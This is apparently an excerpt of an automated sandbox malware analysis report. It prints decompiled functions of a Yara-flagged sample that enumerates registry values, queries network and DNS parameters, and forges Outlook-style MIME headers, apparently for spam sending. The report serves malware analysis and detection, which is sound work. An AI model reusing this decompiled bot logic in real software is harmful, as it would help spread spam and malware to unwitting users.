                                                                                                                                  Function 0042D459 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 368COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
                                                                                                                                  • String ID: -$9
                                                                                                                                  • API String ID: 3451365851-1631151375
                                                                                                                                  • Opcode ID: 54b7069774bb0cb7d3955371641dd9def0482dd4aec8b2fe72b736631d92e6e8
                                                                                                                                  • Instruction ID: 47dd038e71b6e8d87cef41845c8892bd9c182dcfcc000af15c34b3d9f0a9e589
                                                                                                                                  • Opcode Fuzzy Hash: 54b7069774bb0cb7d3955371641dd9def0482dd4aec8b2fe72b736631d92e6e8
                                                                                                                                  • Instruction Fuzzy Hash: D3F14DB1E052299FDB24CF58DC89BEEB7B1BB44304F5481DAE019A7281D7789E80CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E7CB Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 365COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 3455034128-2366072709
                                                                                                                                  • Opcode ID: f34dfe748a1283b40b8cec42bfb9d1d5154c90a26b5fac5b30e95f034362d87d
                                                                                                                                  • Instruction ID: 06cf0195d11e21c04b465d4908b5bf6feeea47427d092b283015566512795ab7
                                                                                                                                  • Opcode Fuzzy Hash: f34dfe748a1283b40b8cec42bfb9d1d5154c90a26b5fac5b30e95f034362d87d
                                                                                                                                  • Instruction Fuzzy Hash: 5DF16BF1E002299FDB24CF46DC81BAEB7B5BB85304F54449AE209A7241D738AE84CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040704C Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 332registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                  			E0040704C(intOrPtr _a4, signed int* _a8, int _a12, int _a16, int* _a20) {
				CHAR* _v8;
				void* _v12;
				signed int _v16;
				int _v20;
				char _v24;
				char _v28;
				signed int _v32;
				char _v64;
				char _v363;
				char _v364;
				void _v400;
				intOrPtr* _t88;
				int* _t89;
				int* _t90;
				int* _t91;
				char* _t93;
				signed int _t96;
				signed int _t97;
				long _t99;
				signed int _t107;
				int _t109;
				int _t119;
				int _t121;
				int _t122;
				int _t123;
				signed int _t125;
				signed int* _t130;
				int _t136;
				int _t149;
				int _t155;
				void* _t158;
				signed int _t166;
				int _t196;
				signed int _t204;
				int _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t211;

				_t88 = _a8;
				_t167 = 0;
				_v16 = 0x12c;
				_v24 = 0x20;
				_v364 = 0;
				if(_t88 != 0) {
					 *_t88 = 0;
				}
				_t89 = _a12;
				if(_t89 != _t167) {
					 *_t89 = _t167;
				}
				_t90 = _a16;
				if(_t90 != _t167) {
					 *_t90 = _t167;
				}
				_t91 = _a20;
				if(_t91 != _t167) {
					 *_t91 = _t167;
				}
				_t93 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t208 = _t207 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t93, _t167, 0x101,  &_v12) != 0) {
					L21:
					_t96 = E0040EE2A(_t167, 0x4122f8, 0, 0x100) | 0xffffffff;
					goto L22;
				} else {
					_t97 = E00406DC2(_t167);
					_push( &_v16);
					_push( &_v364);
					_push( &_v28);
					_v32 = _t97;
					_push(0);
					_push( &_v24);
					_t167 =  &_v64;
					_push( &_v64);
					_v8 = 0;
					_push(0);
					while(1) {
						_t99 = RegEnumValueA(_v12, ??, ??, ??, ??, ??, ??, ??);
						if(_t99 == 0x103) {
							break;
						}
						__eflags = _t99;
						if(_t99 != 0) {
							L18:
							_t25 =  &_v8;
							 *_t25 =  &(_v8[1]);
							__eflags =  *_t25;
							_push( &_v16);
							_push( &_v364);
							_push( &_v28);
							_push(0);
							_push( &_v24);
							_push( &_v64);
							_push(_v8);
							_v16 = 0x12c;
							_v24 = 0x20;
							continue;
						}
						__eflags = _v24 - _t99;
						if(_v24 <= _t99) {
							goto L18;
						}
						__eflags = _v16 - _t99;
						if(_v16 <= _t99) {
							goto L18;
						}
						__eflags = _v28 - 1;
						if(_v28 != 1) {
							goto L18;
						}
						_t107 = E0040EED1( &_v64, E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8));
						_t210 = _t208 + 0x1c;
						asm("sbb eax, eax");
						_t109 =  ~_t107 + 1;
						__eflags = _t109;
						_v20 = _t109;
						if(_t109 != 0) {
							L23:
							_v8 = E0040EE95( &_v364, E00402544(0x4122f8,  &E0041069C, 4, 0xe4, 0xc8));
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t211 = _t210 + 0x28;
							__eflags = _v8;
							if(_v8 == 0) {
								__eflags = _v364 - 0x22;
								if(_v364 == 0x22) {
									E0040EF00( &_v364,  &_v363);
									_t149 = E0040ED23( &_v364, 0x22);
									_t211 = _t211 + 0x10;
									__eflags = _t149;
									if(_t149 != 0) {
										 *_t149 = 0;
									}
								}
								_t196 = E0040EE95( &_v364, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
								E0040EE2A(_t167, 0x4122f8, 0, 0x100);
								__eflags = _t196;
								if(_t196 != 0) {
									_t119 = E0040ED77( &_v364, _a4);
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t196 = 0;
										_t121 = E0040ED23( &_v364, 0x5c);
										_v8 = _t121;
										__eflags = _t121;
										if(_t121 != 0) {
											_t63 =  &_v8;
											 *_t63 =  &(_v8[1]);
											__eflags =  *_t63;
										} else {
											_v8 =  &_v364;
										}
										_t122 = E00406CAD(_v8);
										__eflags = _t122;
										if(_t122 != 0) {
											_pop(_t204);
											_push(0x8b00007e);
											asm("lock xor esi, 0x55555555");
											_v16 = _t204;
											_t166 = _t204 >> 0x00000008 & 0x000000ff;
											_t123 = E00406C96(_t204);
											__eflags = _t123;
											if(_t123 != 0) {
												L57:
												RegCloseKey(_v12);
												__eflags = _a16;
												if(_a16 != 0) {
													E0040EF00(_a16,  &_v64);
												}
												_t125 = 0;
												__eflags = _v20;
												 *_t196 = 0x2e;
												goto L34;
											}
											__eflags = _t166 - 0x40 - 0x3f;
											if(_t166 - 0x40 > 0x3f) {
												goto L57;
											}
											__eflags = (_t204 & 0x000000ff) - 0x10;
											if((_t204 & 0x000000ff) >= 0x10) {
												goto L57;
											}
											_t206 = _a12;
											 *_t196 = 0x2e;
											__eflags = _t206;
											if(_t206 != 0) {
												_t136 = GetFileAttributesExA( &_v364, 0,  &_v400);
												__eflags = _t136;
												if(_t136 != 0) {
													 *_t206 = 1;
												}
											}
											_t130 = _a8;
											__eflags = _t130;
											if(_t130 != 0) {
												 *_t130 = _t166;
											}
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											__eflags = _a20;
											if(_a20 != 0) {
												E0040EF00(_a20, _v8);
											}
											_t125 = 0;
											__eflags = _v20;
											goto L34;
										} else {
											RegCloseKey(_v12);
											__eflags = _a16;
											if(_a16 != 0) {
												E0040EF00(_a16,  &_v64);
											}
											 *_t196 = 0x2e;
											goto L33;
										}
									}
									RegCloseKey(_v12);
									_t96 = 0;
									goto L22;
								} else {
									RegCloseKey(_v12);
									__eflags = _a16;
									if(_a16 != 0) {
										E0040EF00(_a16,  &_v64);
									}
									L33:
									_t125 = 0;
									__eflags = _v20;
									L34:
									_t96 = (_t125 & 0xffffff00 | __eflags == 0x00000000) + 1;
									L22:
									return _t96;
								}
							}
							RegCloseKey(_v12);
							__eflags = _a16;
							if(_a16 != 0) {
								E0040EF00(_a16,  &_v64);
							}
							_t96 = 1;
							goto L22;
						}
						_t155 = E00406CAD( &_v64);
						_pop(_t167);
						__eflags = _t155;
						if(_t155 == 0) {
							L17:
							E0040EE2A(_t167, 0x4122f8, 0, 0x100);
							_t208 = _t210 + 0xc;
							goto L18;
						}
						_t158 = E0040F1A5( &_v64);
						_t167 = _v32 ^ 0x5e5e5e5e;
						__eflags = _t158 - (_v32 ^ 0x5e5e5e5e);
						if(_t158 == (_v32 ^ 0x5e5e5e5e)) {
							goto L23;
						}
						goto L17;
					}
					RegCloseKey(_v12);
					goto L21;
				}
			}










































                                                                                                                                  0x00407055
                                                                                                                                  0x00407058
                                                                                                                                  0x0040705a
                                                                                                                                  0x00407061
                                                                                                                                  0x00407068
                                                                                                                                  0x00407071
                                                                                                                                  0x00407073
                                                                                                                                  0x00407073
                                                                                                                                  0x00407075
                                                                                                                                  0x0040707a
                                                                                                                                  0x0040707c
                                                                                                                                  0x0040707c
                                                                                                                                  0x0040707e
                                                                                                                                  0x00407083
                                                                                                                                  0x00407085
                                                                                                                                  0x00407085
                                                                                                                                  0x00407087
                                                                                                                                  0x0040708c
                                                                                                                                  0x0040708e
                                                                                                                                  0x0040708e
                                                                                                                                  0x004070b4
                                                                                                                                  0x004070b9
                                                                                                                                  0x004070ca
                                                                                                                                  0x004071b8
                                                                                                                                  0x004071c8
                                                                                                                                  0x00000000
                                                                                                                                  0x004070d0
                                                                                                                                  0x004070d0
                                                                                                                                  0x004070d8
                                                                                                                                  0x004070df
                                                                                                                                  0x004070e3
                                                                                                                                  0x004070e4
                                                                                                                                  0x004070e9
                                                                                                                                  0x004070ed
                                                                                                                                  0x004070ee
                                                                                                                                  0x004070f1
                                                                                                                                  0x004070f2
                                                                                                                                  0x004070f5
                                                                                                                                  0x0040719b
                                                                                                                                  0x0040719e
                                                                                                                                  0x004071a9
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004070fb
                                                                                                                                  0x004070fd
                                                                                                                                  0x0040716e
                                                                                                                                  0x0040716e
                                                                                                                                  0x0040716e
                                                                                                                                  0x0040716e
                                                                                                                                  0x00407174
                                                                                                                                  0x0040717b
                                                                                                                                  0x0040717f
                                                                                                                                  0x00407180
                                                                                                                                  0x00407185
                                                                                                                                  0x00407189
                                                                                                                                  0x0040718a
                                                                                                                                  0x0040718d
                                                                                                                                  0x00407194
                                                                                                                                  0x00000000
                                                                                                                                  0x00407194
                                                                                                                                  0x004070ff
                                                                                                                                  0x00407102
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407104
                                                                                                                                  0x00407107
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407109
                                                                                                                                  0x0040710d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407123
                                                                                                                                  0x00407128
                                                                                                                                  0x0040712d
                                                                                                                                  0x0040712f
                                                                                                                                  0x0040712f
                                                                                                                                  0x00407130
                                                                                                                                  0x00407133
                                                                                                                                  0x004071d0
                                                                                                                                  0x004071f4
                                                                                                                                  0x004071f7
                                                                                                                                  0x004071fc
                                                                                                                                  0x004071ff
                                                                                                                                  0x00407203
                                                                                                                                  0x00407227
                                                                                                                                  0x0040722e
                                                                                                                                  0x0040723e
                                                                                                                                  0x0040724c
                                                                                                                                  0x00407251
                                                                                                                                  0x00407254
                                                                                                                                  0x00407256
                                                                                                                                  0x00407258
                                                                                                                                  0x00407258
                                                                                                                                  0x00407256
                                                                                                                                  0x00407280
                                                                                                                                  0x00407282
                                                                                                                                  0x0040728a
                                                                                                                                  0x0040728c
                                                                                                                                  0x004072c2
                                                                                                                                  0x004072c9
                                                                                                                                  0x004072cb
                                                                                                                                  0x004072e6
                                                                                                                                  0x004072e8
                                                                                                                                  0x004072ef
                                                                                                                                  0x004072f2
                                                                                                                                  0x004072f4
                                                                                                                                  0x00407301
                                                                                                                                  0x00407301
                                                                                                                                  0x00407301
                                                                                                                                  0x004072f6
                                                                                                                                  0x004072fc
                                                                                                                                  0x004072fc
                                                                                                                                  0x00407307
                                                                                                                                  0x0040730d
                                                                                                                                  0x0040730f
                                                                                                                                  0x00407338
                                                                                                                                  0x00407339
                                                                                                                                  0x0040733e
                                                                                                                                  0x0040734b
                                                                                                                                  0x0040734e
                                                                                                                                  0x00407354
                                                                                                                                  0x0040735b
                                                                                                                                  0x0040735d
                                                                                                                                  0x004073d5
                                                                                                                                  0x004073d8
                                                                                                                                  0x004073de
                                                                                                                                  0x004073e2
                                                                                                                                  0x004073eb
                                                                                                                                  0x004073f1
                                                                                                                                  0x004073f2
                                                                                                                                  0x004073f4
                                                                                                                                  0x004073f7
                                                                                                                                  0x00000000
                                                                                                                                  0x004073f7
                                                                                                                                  0x00407362
                                                                                                                                  0x00407365
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040736d
                                                                                                                                  0x00407370
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407372
                                                                                                                                  0x00407375
                                                                                                                                  0x0040737a
                                                                                                                                  0x0040737c
                                                                                                                                  0x0040738d
                                                                                                                                  0x00407393
                                                                                                                                  0x00407395
                                                                                                                                  0x00407397
                                                                                                                                  0x00407397
                                                                                                                                  0x00407395
                                                                                                                                  0x0040739d
                                                                                                                                  0x004073a0
                                                                                                                                  0x004073a2
                                                                                                                                  0x004073a4
                                                                                                                                  0x004073a4
                                                                                                                                  0x004073a6
                                                                                                                                  0x004073a9
                                                                                                                                  0x004073b2
                                                                                                                                  0x004073b8
                                                                                                                                  0x004073b9
                                                                                                                                  0x004073bc
                                                                                                                                  0x004073c4
                                                                                                                                  0x004073ca
                                                                                                                                  0x004073cb
                                                                                                                                  0x004073cd
                                                                                                                                  0x00000000
                                                                                                                                  0x00407311
                                                                                                                                  0x00407314
                                                                                                                                  0x0040731a
                                                                                                                                  0x0040731d
                                                                                                                                  0x00407326
                                                                                                                                  0x0040732c
                                                                                                                                  0x0040732d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040732d
                                                                                                                                  0x0040730f
                                                                                                                                  0x004072d0
                                                                                                                                  0x004072d6
                                                                                                                                  0x00000000
                                                                                                                                  0x0040728e
                                                                                                                                  0x00407291
                                                                                                                                  0x00407297
                                                                                                                                  0x0040729a
                                                                                                                                  0x004072a3
                                                                                                                                  0x004072a9
                                                                                                                                  0x004072aa
                                                                                                                                  0x004072aa
                                                                                                                                  0x004072ac
                                                                                                                                  0x004072af
                                                                                                                                  0x004072b2
                                                                                                                                  0x004071cb
                                                                                                                                  0x004071cf
                                                                                                                                  0x004071cf
                                                                                                                                  0x0040728c
                                                                                                                                  0x00407208
                                                                                                                                  0x0040720e
                                                                                                                                  0x00407212
                                                                                                                                  0x0040721b
                                                                                                                                  0x00407221
                                                                                                                                  0x00407224
                                                                                                                                  0x00000000
                                                                                                                                  0x00407224
                                                                                                                                  0x0040713d
                                                                                                                                  0x00407142
                                                                                                                                  0x00407143
                                                                                                                                  0x00407145
                                                                                                                                  0x0040715e
                                                                                                                                  0x00407166
                                                                                                                                  0x0040716b
                                                                                                                                  0x00000000
                                                                                                                                  0x0040716b
                                                                                                                                  0x0040714b
                                                                                                                                  0x00407154
                                                                                                                                  0x0040715a
                                                                                                                                  0x0040715c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040715c
                                                                                                                                  0x004071b2
                                                                                                                                  0x00000000
                                                                                                                                  0x004071b2

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000101,761B43E0,?,761B43E0,00000000), ref: 004070C2
                                                                                                                                  • RegEnumValueA.ADVAPI32 ref: 0040719E
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0,?,761B43E0,00000000), ref: 004071B2
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407208
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407291
                                                                                                                                  • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 004072D0
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 00407314
                                                                                                                                  • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                                                                  • RegCloseKey.ADVAPI32(761B43E0), ref: 004073D8
                                                                                                                                    • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,004122F8,000000C8,00407150,?), ref: 0040F1AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                                                                  • String ID: $"
                                                                                                                                  • API String ID: 4293430545-3817095088
                                                                                                                                  • Opcode ID: d919dbd9af1343ac96c8c832437364b04d25ba813f015b914b967c8048a51357
                                                                                                                                  • Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
                                                                                                                                  • Opcode Fuzzy Hash: d919dbd9af1343ac96c8c832437364b04d25ba813f015b914b967c8048a51357
                                                                                                                                  • Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040AD89 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 121timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E0040AD89(void* __ecx, void* __eflags) {
				signed int _t48;
				signed int _t50;
				void* _t53;
				intOrPtr _t55;
				void* _t76;
				signed int _t77;
				void* _t81;
				CHAR* _t92;
				void* _t94;
				void* _t96;
				void* _t98;

				_t76 = __ecx;
				_t94 = _t96 - 0x74;
				GetLocalTime(_t94 + 0x50);
				SystemTimeToFileTime(_t94 + 0x50, _t94 + 0x64);
				E0040EE2A(_t76, _t94 - 0x110, 0, 0x80);
				E0040AD08(_t94 - 0x110);
				_t98 = _t96 - 0x184 + 0x10;
				if(E004030B5() == 0) {
					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
				} else {
					_push(_t94 - 0x90);
					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
				}
				_t48 = E0040ECA5();
				_t77 = 0xe;
				_t50 = E0040ECA5();
				_t92 = "%OUTLOOK_BND_";
				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				while(1) {
					_t103 = _t53;
					if(_t53 == 0) {
						break;
					}
					_t55 = E0040EDAC(_t53 + 0xd);
					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
					__eflags = _t81;
					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
					_t98 = _t98 + 0x40;
					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
				}
				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
			}














                                                                                                                                  0x0040ad89
                                                                                                                                  0x0040ad8a
                                                                                                                                  0x0040ad98
                                                                                                                                  0x0040ada6
                                                                                                                                  0x0040adba
                                                                                                                                  0x0040adc6
                                                                                                                                  0x0040adcb
                                                                                                                                  0x0040add5
                                                                                                                                  0x0040adeb
                                                                                                                                  0x0040add7
                                                                                                                                  0x0040addd
                                                                                                                                  0x0040ade6
                                                                                                                                  0x0040ade6
                                                                                                                                  0x0040adf5
                                                                                                                                  0x0040adfe
                                                                                                                                  0x0040ae03
                                                                                                                                  0x0040ae0f
                                                                                                                                  0x0040ae18
                                                                                                                                  0x0040ae1b
                                                                                                                                  0x0040ae7f
                                                                                                                                  0x0040ae81
                                                                                                                                  0x0040ae83
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ae31
                                                                                                                                  0x0040ae3f
                                                                                                                                  0x0040ae3f
                                                                                                                                  0x0040ae43
                                                                                                                                  0x0040ae4f
                                                                                                                                  0x0040ae5e
                                                                                                                                  0x0040ae6e
                                                                                                                                  0x0040ae73
                                                                                                                                  0x0040ae7a
                                                                                                                                  0x0040ae7a
                                                                                                                                  0x0040aea5
                                                                                                                                  0x0040aeb6
                                                                                                                                  0x0040aedc

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                                                                    • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                                                                    • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                                                                    • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                                                                    • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                                                                    • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                                                                    • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                                                                  • wsprintfA.USER32 ref: 0040AEA5
                                                                                                                                    • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                                                                  • wsprintfA.USER32 ref: 0040AE4F
                                                                                                                                  • wsprintfA.USER32 ref: 0040AE5E
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                                                                    • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                                                                  • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                                                                  • API String ID: 3631595830-1816598006
                                                                                                                                  • Opcode ID: 6529b2604f33923130454e2189857e6116d07f16e51892a90e4688e0fcd74ec4
                                                                                                                                  • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                                                                  • Opcode Fuzzy Hash: 6529b2604f33923130454e2189857e6116d07f16e51892a90e4688e0fcd74ec4
                                                                                                                                  • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402DF2 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 97memorylibrarynetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 55%
                                                                                                                                  			E00402DF2(intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				intOrPtr _v28;
				short _v30;
				char _v32;
				struct HINSTANCE__* _t18;
				void* _t22;
				signed int _t23;
				short _t27;
				signed int _t31;
				intOrPtr* _t35;
				intOrPtr* _t37;
				CHAR* _t38;
				void* _t40;

				_t38 = "iphlpapi.dll";
				_t18 = GetModuleHandleA(_t38);
				if(_t18 == 0 || _t18 == 0xffffffff) {
					_t18 = LoadLibraryA(_t38);
				}
				if(_t18 == 0 || _t18 == 0xffffffff) {
					L18:
					return 0;
				} else {
					_t35 = GetProcAddress(_t18, "GetNetworkParams");
					if(_t35 == 0) {
						goto L18;
					}
					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
					_t33 =  &_v16;
					_v8 = _t22;
					_v16 = 0x4000;
					_t23 =  *_t35(_t22,  &_v16);
					if(_t23 != 0) {
						goto L18;
					}
					_v12 = _v12 & _t23;
					_t37 = _v8 + 0x10c;
					if(_t37 == 0) {
						L17:
						HeapFree(GetProcessHeap(), 0, _v8);
						return _v12;
					} else {
						goto L8;
					}
					do {
						L8:
						_t40 = _t37 + 4;
						if(_t40 == 0) {
							goto L16;
						}
						_t27 = 2;
						_v32 = _t27;
						__imp__#9(0x35);
						_v30 = _t27;
						__imp__#11(_t40);
						_v28 = _t27;
						if(_t27 == 0 || _t27 == 0xffffffff) {
							__imp__#52(_t40);
							if(_t27 == 0) {
								goto L16;
							}
							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
							_v28 = _t27;
							goto L13;
						} else {
							L13:
							if(_t27 != 0 && _t27 != 0xffffffff) {
								_t31 = E00402CEB(_t33,  &_v32, _a4);
								_pop(_t33);
								_v12 = _t31;
								if(_t31 != 0) {
									goto L17;
								}
							}
						}
						L16:
						_t37 =  *_t37;
					} while (_t37 != 0);
					goto L17;
				}
			}


















                                                                                                                                  0x00402dfb
                                                                                                                                  0x00402e01
                                                                                                                                  0x00402e09
                                                                                                                                  0x00402e11
                                                                                                                                  0x00402e11
                                                                                                                                  0x00402e19
                                                                                                                                  0x00402ef1
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e28
                                                                                                                                  0x00402e34
                                                                                                                                  0x00402e38
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e4f
                                                                                                                                  0x00402e55
                                                                                                                                  0x00402e5a
                                                                                                                                  0x00402e5d
                                                                                                                                  0x00402e60
                                                                                                                                  0x00402e64
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e6d
                                                                                                                                  0x00402e70
                                                                                                                                  0x00402e76
                                                                                                                                  0x00402ede
                                                                                                                                  0x00402ee6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e78
                                                                                                                                  0x00402e78
                                                                                                                                  0x00402e78
                                                                                                                                  0x00402e7d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e81
                                                                                                                                  0x00402e84
                                                                                                                                  0x00402e88
                                                                                                                                  0x00402e8f
                                                                                                                                  0x00402e93
                                                                                                                                  0x00402e99
                                                                                                                                  0x00402e9e
                                                                                                                                  0x00402ea6
                                                                                                                                  0x00402eae
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402eb5
                                                                                                                                  0x00402eb7
                                                                                                                                  0x00000000
                                                                                                                                  0x00402eba
                                                                                                                                  0x00402eba
                                                                                                                                  0x00402ebc
                                                                                                                                  0x00402eca
                                                                                                                                  0x00402ed0
                                                                                                                                  0x00402ed1
                                                                                                                                  0x00402ed6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402ed6
                                                                                                                                  0x00402ebc
                                                                                                                                  0x00402ed8
                                                                                                                                  0x00402ed8
                                                                                                                                  0x00402eda
                                                                                                                                  0x00000000
                                                                                                                                  0x00402e78

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(iphlpapi.dll,7620EA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
